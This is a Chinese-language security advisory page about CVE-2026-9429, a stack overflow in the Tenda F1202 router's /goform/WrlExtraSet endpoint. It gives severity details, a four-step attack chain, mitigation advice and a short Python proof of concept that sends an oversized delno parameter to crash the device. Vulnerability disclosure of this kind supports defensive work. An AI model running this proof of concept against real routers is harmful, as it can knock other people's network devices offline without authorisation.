IPBUF安全漏洞报告
English
CVE-2026-9429 CVSS 8.8 高危

CVE-2026-9429 Tenda F1202 栈溢出漏洞

披露日期: 2026-05-25
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-9429
漏洞类型
栈溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda F1202

相关标签

栈溢出缓冲区溢出Tenda路由器RCECVE-2026-9429

漏洞概述

Tenda F1202路由器在/goform/WrlExtraSet接口存在高危栈溢出漏洞。攻击者无需用户交互,仅需低权限即可通过构造恶意delno参数触发缓冲区溢出,导致设备拒绝服务或远程代码执行。

技术细节

漏洞发生在Tenda F1202路由器固件V1.2.0.20(408)版本的Web服务中。在处理/goform/WrlExtraSet的POST请求时,formWrlExtraSet函数使用不安全的拷贝方式处理用户提交的delno参数。由于未对输入长度进行校验,超长数据会覆盖栈上的返回地址。攻击者可通过精心设计的载荷控制程序执行流,结合ROP链等技术实现远程代码执行,从而完全控制设备。

攻击链分析

STEP 1
1. 目标发现
攻击者通过网络扫描识别暴露的Tenda F1202路由器设备。
STEP 2
2. 载荷构造
攻击者构造超长的delno参数字符串,旨在覆盖栈上的关键指令指针。
STEP 3
3. 恶意请求
攻击者向目标路由器的/goform/WrlExtraSet端点发送包含恶意载荷的HTTP POST请求。
STEP 4
4. 溢出执行
服务器端程序处理请求时触发栈溢出,导致服务崩溃或执行攻击者注入的Shellcode。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_ip): url = f"http://{target_ip}/goform/WrlExtraSet" # Payload to trigger stack overflow # Adjust buffer size based on specific offset analysis payload = "A" * 500 data = { "delno": payload } try: print(f"Sending payload to {url}...") response = requests.post(url, data=data, timeout=5) print(f"Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Request failed (device may have crashed): {e}") if __name__ == "__main__": target = "192.168.0.1" # Replace with actual target IP exploit(target)

影响范围

Tenda F1202 1.2.0.20(408)

防御指南

临时缓解措施
如果无法立即升级固件,建议将路由器Web管理界面仅绑定至内网IP,并配置网络访问控制列表(ACL)阻止外部IP对管理端口的访问,同时监控网络流量中是否存在针对/goform/WrlExtraSet的异常请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表